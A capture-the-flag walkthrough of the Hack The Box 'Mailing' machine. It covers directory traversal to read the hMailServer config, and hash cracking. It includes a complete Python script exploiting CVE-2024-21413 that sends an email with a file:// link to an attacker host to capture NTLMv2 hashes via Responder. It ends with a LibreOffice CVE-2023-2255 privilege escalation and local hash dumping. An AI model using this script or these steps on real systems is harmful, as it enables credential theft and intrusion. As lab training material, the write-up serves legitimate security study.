Introduction to Mailing:

In this write-up, we will explore the “Mailing” machine from Hack the Box, categorized as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Mailing” machine from Hack The Box by achieving the following objectives:
User Flag:
PHP Site Vulnerability
- Found a PHP site whose download endpoint takes a file name from the request and reads it back to the client.
- Confirmed directory traversal in that endpoint, allowing files outside the web root (notably the hMailServer configuration file) to be read.
CVE-2024-21413 Exploitation
- CVE-2024-21413 (“MonikerLink”) is a Microsoft Outlook vulnerability, rated as remote code execution, in which a crafted file:// link in an email bypasses Protected View and makes Outlook authenticate to an attacker-controlled SMB share, leaking the recipient’s NTLMv2 hash.
- The captured hash yields credentials that are used for further access to the system.
Root Flag:
hMailServer Configuration Leak and Credential Discovery
- Extracted the hMailServer configuration file.
- Cracked the password hash to retrieve valid credentials.
CVE-2023-2255 Exploitation
- A flaw in LibreOffice’s editor components allowed the automatic loading of external links without user consent.
- Documents with “floating frames” linked to external files triggered this vulnerability.
- Affected versions: LibreOffice 7.4 (before 7.4.7) and 7.5 (before 7.5.3).
Enumerating the Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oA initial 10.10.11.14
Nmap Output:
┌─[darknite@parrot]─[~/Documents/htb]
└──╼ $nmap -sC -sV 10.10.11.14 -oA initial
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-07 06:34 EDT
Nmap scan report for 10.10.11.14
Host is up (0.017s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: UIDL USER TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: RIGHTS=texkA0001 IDLE CHILDREN NAMESPACE IMAP4rev1 IMAP4 completed ACL CAPABILITY QUOTA OK SORT
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
587/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap hMailServer imapd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_imap-capabilities: RIGHTS=texkA0001 IDLE CHILDREN NAMESPACE IMAP4rev1 IMAP4 completed ACL CAPABILITY QUOTA OK SORT
|_ssl-date: TLS randomness does not represent time
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-09-07T10:25:06
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: -10m10s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.37 seconds
Analysis:
- Port 25 (SMTP): hMailServer smtpd; advertises AUTH LOGIN/PLAIN, so the server accepts authenticated submissions.
- Port 80 (HTTP): IIS 10.0, redirecting to http://mailing.htb. Add “10.10.11.14 mailing.htb” to /etc/hosts before enumerating the site, otherwise every request ends at the redirect.
- Port 110 (POP3): hMailServer pop3d, used for retrieving email.
- Port 135 (MSRPC): Microsoft RPC endpoint mapper.
- Port 139 (NetBIOS-SSN): NetBIOS session service (file and printer sharing).
- Port 143 (IMAP): hMailServer imapd.
- Port 445 (SMB): Windows file sharing; the host script shows message signing enabled but not required.
- Port 465 (SMTPS): SMTP over SSL/TLS, same hMailServer banner, with a self-signed certificate for mailing.htb (organisation “Mailing Ltd”, valid 2024-02-27 to 2029-10-06).
- Port 587 (SMTP submission): STARTTLS plus AUTH LOGIN/PLAIN, which is the port an authenticated sender would normally use.
- Port 993 (IMAPS): IMAP over SSL/TLS.
Everything points to a single Windows host running IIS and hMailServer; the mail services are where credentials will matter later, and the 10-minute clock skew is worth noting if Kerberos ever comes into play.
Web Enumeration:
Perform web enumeration to discover potentially exploitable directories and files.
gobuster dir -u http://mailing.htb -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
Gobuster Output:
┌─[darknite@parrot]─[~/Documents/htb]
└──╼ $gobuster dir -u http://mailing.htb -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://mailing.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 160] [--> http://mailing.htb/assets/]
/Assets (Status: 301) [Size: 160] [--> http://mailing.htb/Assets/]
/instructions (Status: 301) [Size: 166] [--> http://mailing.htb/instructions/]
/Instructions (Status: 301) [Size: 166] [--> http://mailing.htb/Instructions/]
Progress: 20116 / 20117 (100.00%)
===============================================================
Finished
===============================================================
Analysis:
Status Code 301 (Moved Permanently):
- IIS redirects these paths to their trailing-slash form, which means they are directories (IIS paths are case-insensitive, hence the duplicate upper/lower-case hits):
- /assets → /assets/
- /instructions → /instructions/
Web Exploitation
Web Application Exploration:

The site’s interface is pretty basic, and at first glance, it doesn’t seem like there’s much to explore.

A few image files are sitting in the assets directory.

You can spot the download option at the bottom of the page.

I encountered an error stating, “No file specified for download.”
Exploit CVE-2024-21413 on mailing machine
CVE-2024-21413 (“MonikerLink”) is a Microsoft Outlook vulnerability, rated by Microsoft as remote code execution, that in practice is used to capture a user’s NTLMv2 hash: a file:// link ending in “!” plus extra text bypasses Outlook’s Protected View, so Outlook resolves the UNC path and authenticates to an attacker-controlled SMB server. A public exploit script is available on GitHub. It sends the email through the target’s own SMTP server, which requires authentication (AUTH LOGIN/PLAIN in the nmap output), so we first need valid credentials.

Back to the download endpoint: it takes a file name from the request, so it seems an LFI (Local File Inclusion) / directory traversal attack might be possible here. The interesting target is the hMailServer configuration file.


What is hMailServer?
hMailServer was a free email server for Windows, developed by Martin Knafve. It operated as a Windows service and included tools for management and backup. The server supported IMAP, POP3, and SMTP protocols and could use external databases like MySQL, MS SQL, or PostgreSQL, or an internal MS SQL Compact Edition engine for storing configuration and index data. Email messages were stored on disk in raw MIME format. As of January 15, 2022, active support and development have ended, but version 5.6 still receives updates for critical bugs. Its settings live in hMailServer.ini under the Bin folder of the installation directory, and the [Security] section of that file stores the administrator password as an unsalted MD5 hash, which is what the file read gives us.

The configuration file contains an MD5 hash of the administrator password. A hash cannot be “decrypted”, but an unsalted MD5 of a weak password can be looked up in a precomputed table or brute-forced, so we’ll use CrackStation to try and crack it.

We’ve successfully cracked the password.
Play around with Responder
Configuring Responder:
Responder will stand in as the SMB server that Outlook connects to, so start it on the VPN interface before sending anything:
sudo responder -I tun0

With Responder listening, run the CVE-2024-21413 exploit script, sending the crafted email through the target’s SMTP server with the credentials cracked above. When the recipient’s Outlook processes the link, it authenticates to our SMB listener and Responder prints the captured NTLMv2 hash, which can then be cracked to recover that user’s password.
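What the exploit script does on the wire, as an added example written for this page rather than the write-up’s own script: build an email whose HTML part carries the MonikerLink-style file:// anchor and submit it through hMailServer on port 587 (STARTTLS and AUTH LOGIN/PLAIN, per the nmap output). The attacker address, sender and recipient mailboxes, and the share and file names in the link are placeholders, not values from the target; the share does not need to exist, since the NTLM authentication happens before any file is opened.

```python
import smtplib
import ssl
from email.message import EmailMessage

# Placeholders (assumed, not from the target): our VPN address and two mailboxes.
ATTACKER_IP = "10.10.14.5"
SENDER = "administrator@mailing.htb"
RECIPIENT = "maya@mailing.htb"


def moniker_link(attacker_ip: str, share: str = "share", item: str = "note.txt") -> str:
    """Build the CVE-2024-21413 link.

    Outlook normally refuses file:// links to remote files (Protected View), but a
    '!' after the path makes the string parse as a composite moniker, the check is
    skipped, and Outlook resolves the UNC path, authenticating to our SMB listener.
    """
    return f"file:///\\\\{attacker_ip}\\{share}\\{item}!exploit"


def build_message(sender: str, recipient: str, attacker_ip: str,
                  subject: str = "Please review") -> EmailMessage:
    """Plain-text and HTML alternatives, the HTML part carrying the poisoned anchor."""
    link = moniker_link(attacker_ip)
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(f"Open the document here: {link}")
    msg.add_alternative(
        f'<html><body><p>Open the document here: <a href="{link}">{link}</a></p></body></html>',
        subtype="html",
    )
    return msg


def send(msg: EmailMessage, host: str, port: int, user: str, password: str) -> None:
    """Submit through the target's own hMailServer on 587 (STARTTLS + AUTH).

    The lab certificate is self-signed, so verification is disabled here; do not
    carry that setting over to anything outside a lab.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with smtplib.SMTP(host, port, timeout=15) as smtp:
        smtp.ehlo()
        smtp.starttls(context=ctx)
        smtp.ehlo()
        smtp.login(user, password)
        smtp.send_message(msg)


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 3:  # python3 monikerlink.py <smtp-user> <smtp-password>
        print(f"usage: {sys.argv[0]} <smtp-user> <smtp-password>\n")
        print(build_message(SENDER, RECIPIENT, ATTACKER_IP).as_string())
    else:
        send(build_message(SENDER, RECIPIENT, ATTACKER_IP), "mailing.htb", 587,
             sys.argv[1], sys.argv[2])
```

Without arguments the script only prints the message it would send, which is a useful check that the href survived MIME encoding before you point it at a live mailbox. Responder must already be listening on the interface that ATTACKER_IP belongs to; the captured credential shows up in its output as an NTLMv2-SSP hash in hashcat format.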


We can read the user flag by typing the “cat user.txt” command
Escalation to Root Privileges Access
Privilege Escalation:
- Exploration: During the system investigation, a LibreOffice file named dark.odt stood out because of the LibreOffice version associated with it.
- LibreOffice version: The installed LibreOffice version was checked, since it determines which vulnerabilities and exploits apply.


After searching, I located the LibreOffice installation in the Program Files folder, and it’s version 7.4. Check the exact build, since only 7.4 releases before 7.4.7 are affected by the CVE below.
CVE-2023-2255 Vulnerability
LibreOffice had a flaw in its editor components that let attackers create documents causing external links to load automatically without user consent. Specifically, documents with “floating frames” linked to external files would load their contents without asking for permission. This inconsistent handling affected versions of LibreOffice 7.4 before 7.4.7 and 7.5 before 7.5.3.

Run the public CVE-2023-2255 PoC script to generate the malicious .odt, embedding the command we want executed when the document is opened.

Copy the file to the victim’s machine.

The dark.odt file does nothing when left in the home directory; it is only picked up and opened when placed in C:\Important Documents, so copy it there. After it has been opened, you can see that Maya’s Local Group Memberships now include Administrators.

Next, with Maya now a local administrator, we need the localadmin account’s hash: we can use netexec over SMB with Maya’s credentials to dump the local account hashes, then authenticate as localadmin with the recovered hash.


We can read the root flag by typing the “type root.txt” command